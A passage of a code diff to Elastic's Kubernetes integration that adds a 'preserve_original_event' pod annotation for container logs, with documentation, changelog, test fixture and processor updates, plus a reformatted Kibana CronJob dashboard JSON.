respectively. @@ -38,6 +38,7 @@ spec: annotations: elastic.co/dataset: kubernetes.container_logs.nginx elastic.co/namespace: nginx + elastic.co/preserve_original_event: "true" labels: app: nginx app.kubernetes.io/name: myservice @@ -51,10 +52,10 @@ spec: - containerPort: 80 ``` +### Set at runtime -### Set routing at runtime - -Suppose you want to change the container logs routing on a running container. In that case, you can annotate the pod using `kubectl`, and the integration will apply it immediately sending all the following documents to the new destination: +Suppose you want to change the container logs routing and enable `preserve_original_event` on a running container. +In that case, you can annotate the pod using `kubectl`, and the integration will apply it immediately sending all the following documents to the new destination: Here is an example where we route the container logs for a pod running the Elastic Agent to the `kubernetes.container_logs.agents` dataset: @@ -68,19 +69,26 @@ Here's a similar example to change the namespace on a pod running Nginx: kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/namespace=nginx ``` -You can restore the standard routing by removing the annotations: +Here is an example to enable `preserve_original_event` on a pod running Nginx: + +```shell +kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/preserve_original_event=true +``` + +You can restore the standard settings by removing the annotations: ```shell kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/dataset- kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/namespace- +kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/preserve_original_event- ``` ### Annotations Reference Here are the annotations available to customize routing: - -| Label | Description | -| ---------------------- | -------------------------------------------------------- | -| `elastic.co/dataset` | Defines the target data stream's dataset for this pod. | -| `elastic.co/namespace` | Defines the target data stream's namespace for this pod. | +| Label | Description | +| ------------------------------------ | ---------------------------------------------------------------------------------------------- | +| `elastic.co/dataset` | Defines the target data stream's dataset for this pod. | +| `elastic.co/namespace` | Defines the target data stream's namespace for this pod. | +| `elastic.co/preserve_original_event` | Enables 'preserve_original_event' for this pod. Use string 'true' (case-insensitive) to enable | diff --git a/packages/kubernetes/changelog.yml b/packages/kubernetes/changelog.yml index 502c8fac931..51e2ab9e747 100644 --- a/packages/kubernetes/changelog.yml +++ b/packages/kubernetes/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: 1.58.0 + changes: + - description: Migrate to format_version v3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9356 +- version: 1.57.0 + changes: + - description: Container logs preserve original content based on pod annotations. + type: enhancement + link: https://github.com/elastic/integrations/pull/9036 - version: 1.56.0 changes: - description: Add new fields to API server, state_node and persistent volume claim data streams. diff --git a/packages/kubernetes/data_stream/apiserver/fields/fields.yml b/packages/kubernetes/data_stream/apiserver/fields/fields.yml index e296a5dee3e..df079d7f505 100644 --- a/packages/kubernetes/data_stream/apiserver/fields/fields.yml +++ b/packages/kubernetes/data_stream/apiserver/fields/fields.yml @@ -170,6 +170,7 @@ description: Request duration, number of operations - name: duration.us.bucket.* type: object + object_type: long description: Request duration, histogram buckets - name: current.count type: long diff --git a/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-common-config.yml b/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-common-config.yml index 0f481f01759..9bc066fce51 100644 --- a/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-common-config.yml +++ b/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-common-config.yml @@ -6,6 +6,7 @@ fields: annotations: elastic_co/dataset: kubernetes.container_logs.nginx elastic_co/namespace: nginx + elastic_co/preserve_original_event: "true" labels: app_kubernetes_io/version: "v0.1.0" app_kubernetes_io/name: "myservice" diff --git a/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-nginx.log-expected.json b/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-nginx.log-expected.json index 1060e297815..82259b27093 100644 --- a/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-nginx.log-expected.json +++ b/packages/kubernetes/data_stream/container_logs/_dev/test/pipeline/test-nginx.log-expected.json @@ -9,7 +9,8 @@ "kubernetes": { "annotations": { "elastic_co/dataset": "kubernetes.container_logs.nginx", - "elastic_co/namespace": "nginx" + "elastic_co/namespace": "nginx", + "elastic_co/preserve_original_event": "true" }, "labels": { "app_kubernetes_io/name": "myservice", @@ -31,7 +32,8 @@ "kubernetes": { "annotations": { "elastic_co/dataset": "kubernetes.container_logs.nginx", - "elastic_co/namespace": "nginx" + "elastic_co/namespace": "nginx", + "elastic_co/preserve_original_event": "true" }, "labels": { "app_kubernetes_io/name": "myservice", @@ -53,7 +55,8 @@ "kubernetes": { "annotations": { "elastic_co/dataset": "kubernetes.container_logs.nginx", - "elastic_co/namespace": "nginx" + "elastic_co/namespace": "nginx", + "elastic_co/preserve_original_event": "true" }, "labels": { "app_kubernetes_io/name": "myservice", @@ -75,7 +78,8 @@ "kubernetes": { "annotations": { "elastic_co/dataset": "kubernetes.container_logs.nginx", - "elastic_co/namespace": "nginx" + "elastic_co/namespace": "nginx", + "elastic_co/preserve_original_event": "true" }, "labels": { "app_kubernetes_io/name": "myservice", @@ -89,4 +93,4 @@ } } ] -} \ No newline at end of file +} diff --git a/packages/kubernetes/data_stream/container_logs/agent/stream/stream.yml.hbs b/packages/kubernetes/data_stream/container_logs/agent/stream/stream.yml.hbs index abc6a5a9d74..0c451dffe91 100644 --- a/packages/kubernetes/data_stream/container_logs/agent/stream/stream.yml.hbs +++ b/packages/kubernetes/data_stream/container_logs/agent/stream/stream.yml.hbs @@ -22,14 +22,14 @@ processors: The kubernetes provider supports[^1] pods annotations, making it possible to add them to the event using the `include_annotations` configuration option. - + However, adding annotations to the event is disabled by default, and it is not possible to enable it on Fleet-managed agents. The following processors are a workaround to add the annotations to the event without using the `include_annotations` configuration option. - + [^1]: https://github.com/elastic/elastic-agent/blob/37ec2bb7ee1d2cc6c0fccf2f0cd0a44eb3d61efd/internal/pkg/composable/providers/kubernetes/pod.go#L311-L315 }} - add_fields: @@ -37,6 +37,7 @@ processors: fields: annotations.elastic_co/dataset: ${kubernetes.annotations.elastic.co/dataset|""} annotations.elastic_co/namespace: ${kubernetes.annotations.elastic.co/namespace|""} + annotations.elastic_co/preserve_original_event: ${kubernetes.annotations.elastic.co/preserve_original_event|""} - drop_fields: fields: - kubernetes.annotations.elastic_co/dataset @@ -51,7 +52,23 @@ processors: equals: kubernetes.annotations.elastic_co/namespace: "" ignore_missing: true -{{#if processors}} +- drop_fields: + fields: + - kubernetes.annotations.elastic_co/preserve_original_event + when: + equals: + kubernetes.annotations.elastic_co/preserve_original_event: "" + ignore_missing: true +- add_tags: + tags: ["preserve_original_event"] + when: + and: + - has_fields: + - kubernetes.annotations.elastic_co/preserve_original_event + - regexp: + kubernetes.annotations.elastic_co/preserve_original_event: "^(?i)true$" + +{{#if processors}} {{processors}} {{/if}} diff --git a/packages/kubernetes/data_stream/container_logs/fields/ecs.yml b/packages/kubernetes/data_stream/container_logs/fields/ecs.yml index e5533027809..0e0f3e7f731 100644 --- a/packages/kubernetes/data_stream/container_logs/fields/ecs.yml +++ b/packages/kubernetes/data_stream/container_logs/fields/ecs.yml @@ -26,3 +26,5 @@ name: service.name - external: ecs name: service.version +- external: ecs + name: tags diff --git a/packages/kubernetes/data_stream/container_logs/manifest.yml b/packages/kubernetes/data_stream/container_logs/manifest.yml index d6f4a339f0c..70ed504bfe6 100644 --- a/packages/kubernetes/data_stream/container_logs/manifest.yml +++ b/packages/kubernetes/data_stream/container_logs/manifest.yml @@ -78,5 +78,6 @@ streams: type: yaml default: "" # Ensures agents have permissions to write data to `logs-*-*` -elasticsearch.dynamic_dataset: true -elasticsearch.dynamic_namespace: true +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/kubernetes/docs/README.md b/packages/kubernetes/docs/README.md index 497f32343c1..ce246d7d37c 100644 --- a/packages/kubernetes/docs/README.md +++ b/packages/kubernetes/docs/README.md @@ -86,12 +86,21 @@ This defaults to `/var/log/containers/*${kubernetes.container.id}.log`. #### Routing -The container-logs data stream allows routing logs to a different *dataset* or *namespace* using pod annotations. +The container-logs data stream allows routing logs to a different *dataset* or *namespace* using pod annotations. For example, suppose you are running Nginx on your Kubernetes cluster, and you want to drive the Nginx container logs into a dedicated dataset or namespace. By annotating the pod with `elastic.co/namespace: nginx`, the integration will send all the container logs to the `nginx` namespace. To learn more about routing container-logs, see https://docs.elastic.co/integrations/kubernetes/container-logs. +#### Preserve original event + +The agent can be configured to set the tag `preserve_original_event` on container-logs using pod annotation. + +For example, suppose you are routing your Nginx container logs into a dedicated dataset or namespace as described above to make use of the Nginx fleet integration. Enabling preserve_original_event on the Nginx integration will have no effect +since the logs were shipped via kubernetes integration and not Nginx. As well, you may not want to have all original events from all Nginx pods preserved as well. + +By annotating the pod with `elastic.co/preserve_original_event: 'true'`, the integration will add the tag `preserve_original_event` as it would be done by the `nginx` integration otherwise. + ### audit-logs The audit-logs dataset requires access to the log files on each Kubernetes node where the audit logs are stored. diff --git a/packages/kubernetes/docs/container-logs.md b/packages/kubernetes/docs/container-logs.md index 0c45b0ed4b7..92e0490b445 100644 --- a/packages/kubernetes/docs/container-logs.md +++ b/packages/kubernetes/docs/container-logs.md @@ -8,17 +8,17 @@ This defaults to `/var/log/containers/*${kubernetes.container.id}.log`. By default only [container parser](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-filestream.html#_parsers) is enabled. Additional log parsers can be added as an advanced options configuration. -## Rerouting based on pod annotations +## Rerouting and preserve original event based on pod annotations -You can customize the routing of container logs events and sending them to different datasets and namespaces using pods' annotations. +You can customize the routing of container logs events and sending them to different datasets and namespaces, +as well as enable `preserve_original_event` based on using pods' annotations. -Routing customization can happen at: +Customization can happen at: - pod definition time, e.g., using a deployment. - pod runtime, annotating pods using `kubectl`. - -### Set routing at pod definition time +### Set at pod definition time Here is an example of an Nginx deployment where we set both `elastic.co/dataset` and `elastic.co/namespace` annotations to route the container logs to specific datasets and namespace, respectively. @@ -38,6 +38,7 @@ spec: annotations: elastic.co/dataset: kubernetes.container_logs.nginx elastic.co/namespace: nginx + elastic.co/preserve_original_event: "true" labels: app: nginx app.kubernetes.io/name: myservice @@ -51,10 +52,10 @@ spec: - containerPort: 80 ``` +### Set at runtime -### Set routing at runtime - -Suppose you want to change the container logs routing on a running container. In that case, you can annotate the pod using `kubectl`, and the integration will apply it immediately sending all the following documents to the new destination: +Suppose you want to change the container logs routing and enable `preserve_original_event` on a running container. +In that case, you can annotate the pod using `kubectl`, and the integration will apply it immediately sending all the following documents to the new destination: Here is an example where we route the container logs for a pod running the Elastic Agent to the `kubernetes.container_logs.agents` dataset: @@ -68,19 +69,26 @@ Here's a similar example to change the namespace on a pod running Nginx: kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/namespace=nginx ``` -You can restore the standard routing by removing the annotations: +Here is an example to enable `preserve_original_event` on a pod running Nginx: + +```shell +kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/preserve_original_event=true +``` + +You can restore the standard settings by removing the annotations: ```shell kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/dataset- kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/namespace- +kubectl annotate pods elastic-agent-managed-daemonset-6p22g elastic.co/preserve_original_event- ``` ### Annotations Reference Here are the annotations available to customize routing: - -| Label | Description | -| ---------------------- | -------------------------------------------------------- | -| `elastic.co/dataset` | Defines the target data stream's dataset for this pod. | -| `elastic.co/namespace` | Defines the target data stream's namespace for this pod. | +| Label | Description | +| ------------------------------------ | ---------------------------------------------------------------------------------------------- | +| `elastic.co/dataset` | Defines the target data stream's dataset for this pod. | +| `elastic.co/namespace` | Defines the target data stream's namespace for this pod. | +| `elastic.co/preserve_original_event` | Enables 'preserve_original_event' for this pod. Use string 'true' (case-insensitive) to enable | diff --git a/packages/kubernetes/kibana/dashboard/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013.json b/packages/kubernetes/kibana/dashboard/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013.json index 6a70dac1919..7b1560d2e94 100644 --- a/packages/kubernetes/kibana/dashboard/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013.json +++ b/packages/kubernetes/kibana/dashboard/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013.json @@ -1,441 +1,449 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "twoLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"adf38acd-ecc8-48b2-b7f3-d6dfd024e46b\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"adf38acd-ecc8-48b2-b7f3-d6dfd024e46b\",\"enhancements\":{}}},\"3e873627-001d-47c7-91a8-995014b0ef90\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"3e873627-001d-47c7-91a8-995014b0ef90\",\"enhancements\":{}}},\"f4b8cf46-4644-4713-872d-dccc4aeb1e44\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.cronjob.name\",\"title\":\"CronJob Name\",\"id\":\"f4b8cf46-4644-4713-872d-dccc4aeb1e44\",\"enhancements\":{}}}}" - }, - "description": "Metrics about Cronjobs", - "kibanaSavedObjectMeta": { - "searchSourceJSON": { + "id": "kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-03-13T10:46:00.096Z", + "created_at": "2024-03-13T10:46:00.096Z", + "version": "WzI0MywyXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "twoLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"adf38acd-ecc8-48b2-b7f3-d6dfd024e46b\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"orchestrator.cluster.name\",\"title\":\"Cluster Name\",\"id\":\"adf38acd-ecc8-48b2-b7f3-d6dfd024e46b\",\"enhancements\":{}}},\"3e873627-001d-47c7-91a8-995014b0ef90\":{\"order\":1,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.namespace\",\"title\":\"Namespace Name\",\"id\":\"3e873627-001d-47c7-91a8-995014b0ef90\",\"enhancements\":{}}},\"f4b8cf46-4644-4713-872d-dccc4aeb1e44\":{\"order\":2,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"kubernetes.cronjob.name\",\"title\":\"CronJob Name\",\"id\":\"f4b8cf46-4644-4713-872d-dccc4aeb1e44\",\"enhancements\":{}}}}" + }, + "description": "Metrics about Cronjobs", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { "filter": [], "query": { - "language": "kuery", - "query": "" + "language": "kuery", + "query": "" } - } + } + }, + "description": "", + "params": { + "fontSize": 10, + "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "gridData": { + "h": 7, + "i": "85ecbb8b-9606-4c19-a108-385f825ad7aa", + "w": 32, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "params": { - "fontSize": 10, - "markdown": "[Kubernetes Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 7, - "i": "85ecbb8b-9606-4c19-a108-385f825ad7aa", - "w": 32, - "x": 0, - "y": 0 - }, - "panelIndex": "85ecbb8b-9606-4c19-a108-385f825ad7aa", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.10.2" - }, - { - "embeddableConfig": { - "attributes": { - "description": "", - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-50909abf-3224-4a23-9b48-e80ea170fa2c", - "type": "index-pattern" + "panelIndex": "85ecbb8b-9606-4c19-a108-385f825ad7aa", + "title": "Kubernetes Dashboards [Metrics Kubernetes]", + "type": "visualization", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-50909abf-3224-4a23-9b48-e80ea170fa2c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d5426f2b-4d1b-4499-ad29-0851bdce599b", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "50909abf-3224-4a23-9b48-e80ea170fa2c": { + "columnOrder": [ + "2dbcdfac-a084-43ef-9a51-4dc44305f10c", + "ce290fde-639d-45c5-b54b-49fd6b876437" + ], + "columns": { + "2dbcdfac-a084-43ef-9a51-4dc44305f10c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10000 values of kubernetes.cronjob.name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderAgg": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - { - "id": "metrics-*", - "name": "d5426f2b-4d1b-4499-ad29-0851bdce599b", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "50909abf-3224-4a23-9b48-e80ea170fa2c": { - "columnOrder": [ - "2dbcdfac-a084-43ef-9a51-4dc44305f10c", - "ce290fde-639d-45c5-b54b-49fd6b876437" - ], - "columns": { - "2dbcdfac-a084-43ef-9a51-4dc44305f10c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10000 values of kubernetes.cronjob.name", - "operationType": "terms", - "params": { - "exclude": [], - "excludeIsRegex": false, - "include": [], - "includeIsRegex": false, - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.cronjob.name" - }, - "ce290fde-639d-45c5-b54b-49fd6b876437": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "\"kubernetes.cronjob.active.count\": *" - }, - "isBucketed": false, - "label": "Active CronJobs", - "operationType": "last_value", - "params": { - "showArrayValues": false, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.cronjob.active.count" - } - }, - "ignoreGlobalFilters": false, - "incompleteColumns": {} - } - } - }, - "indexpattern": { - "layers": {} - }, - "textBased": { - "layers": {} - } + "orderBy": { + "type": "custom" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "field": "data_stream.dataset", - "index": "d5426f2b-4d1b-4499-ad29-0851bdce599b", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_cronjob" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_cronjob" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "breakdownByAccessor": "2dbcdfac-a084-43ef-9a51-4dc44305f10c", - "collapseFn": "sum", - "layerId": "50909abf-3224-4a23-9b48-e80ea170fa2c", - "layerType": "data", - "metricAccessor": "ce290fde-639d-45c5-b54b-49fd6b876437" - } + "secondaryFields": [], + "size": 10000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.cronjob.name" }, - "title": "Active CronJobs [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "ce290fde-639d-45c5-b54b-49fd6b876437": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"kubernetes.cronjob.active.count\": *" + }, + "isBucketed": false, + "label": "Active CronJobs", + "operationType": "last_value", + "params": { + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.cronjob.active.count" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {} + } + } }, - "gridData": { - "h": 7, - "i": "37b56399-4cec-4d72-9e9e-e87cbe2d581f", - "w": 16, - "x": 32, - "y": 0 + "indexpattern": { + "layers": {} }, - "panelIndex": "37b56399-4cec-4d72-9e9e-e87cbe2d581f", - "type": "lens", - "version": "8.10.2" + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "index": "d5426f2b-4d1b-4499-ad29-0851bdce599b", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_cronjob" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_cronjob" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "breakdownByAccessor": "2dbcdfac-a084-43ef-9a51-4dc44305f10c", + "collapseFn": "sum", + "layerId": "50909abf-3224-4a23-9b48-e80ea170fa2c", + "layerType": "data", + "metricAccessor": "ce290fde-639d-45c5-b54b-49fd6b876437" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7711169c-3a7b-4071-98d0-3644aa1dde0b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "204eb33a-97ff-4d38-bee0-d93387164ab1", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "7711169c-3a7b-4071-98d0-3644aa1dde0b": { - "columnOrder": [ - "0ef9858e-46db-48c0-ae7c-4da231c9744b", - "8782d440-1d9a-4826-888b-07cda7c4668a", - "e8b720ef-3fec-4c63-8a7a-b64900c938a1", - "118dfa8c-388e-430c-860f-ce84cf88ac39" - ], - "columns": { - "0ef9858e-46db-48c0-ae7c-4da231c9744b": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "CronJob ", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "118dfa8c-388e-430c-860f-ce84cf88ac39", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.cronjob.name" - }, - "118dfa8c-388e-430c-860f-ce84cf88ac39": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Epoch Time until Next Schedule(sec)", - "operationType": "median", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.cronjob.next_schedule.sec" - }, - "8782d440-1d9a-4826-888b-07cda7c4668a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Epoch Time since Creation(sec)", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.cronjob.created.sec" - }, - "e8b720ef-3fec-4c63-8a7a-b64900c938a1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Epoch Time since Last Schedule(sec)", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.cronjob.last_schedule.sec" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Active CronJobs [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 7, + "i": "37b56399-4cec-4d72-9e9e-e87cbe2d581f", + "w": 16, + "x": 32, + "y": 0 + }, + "panelIndex": "37b56399-4cec-4d72-9e9e-e87cbe2d581f", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7711169c-3a7b-4071-98d0-3644aa1dde0b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "204eb33a-97ff-4d38-bee0-d93387164ab1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7711169c-3a7b-4071-98d0-3644aa1dde0b": { + "columnOrder": [ + "0ef9858e-46db-48c0-ae7c-4da231c9744b", + "8782d440-1d9a-4826-888b-07cda7c4668a", + "e8b720ef-3fec-4c63-8a7a-b64900c938a1", + "118dfa8c-388e-430c-860f-ce84cf88ac39" + ], + "columns": { + "0ef9858e-46db-48c0-ae7c-4da231c9744b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "CronJob ", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "118dfa8c-388e-430c-860f-ce84cf88ac39", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "204eb33a-97ff-4d38-bee0-d93387164ab1", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_cronjob" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_cronjob" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "columnId": "0ef9858e-46db-48c0-ae7c-4da231c9744b", - "isTransposed": false - }, - { - "columnId": "8782d440-1d9a-4826-888b-07cda7c4668a", - "isTransposed": false - }, - { - "columnId": "e8b720ef-3fec-4c63-8a7a-b64900c938a1", - "isTransposed": false - }, - { - "columnId": "118dfa8c-388e-430c-860f-ce84cf88ac39", - "isTransposed": false - } - ], - "layerId": "7711169c-3a7b-4071-98d0-3644aa1dde0b", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 + "size": 10 + }, + "scale": "ordinal", + "sourceField": 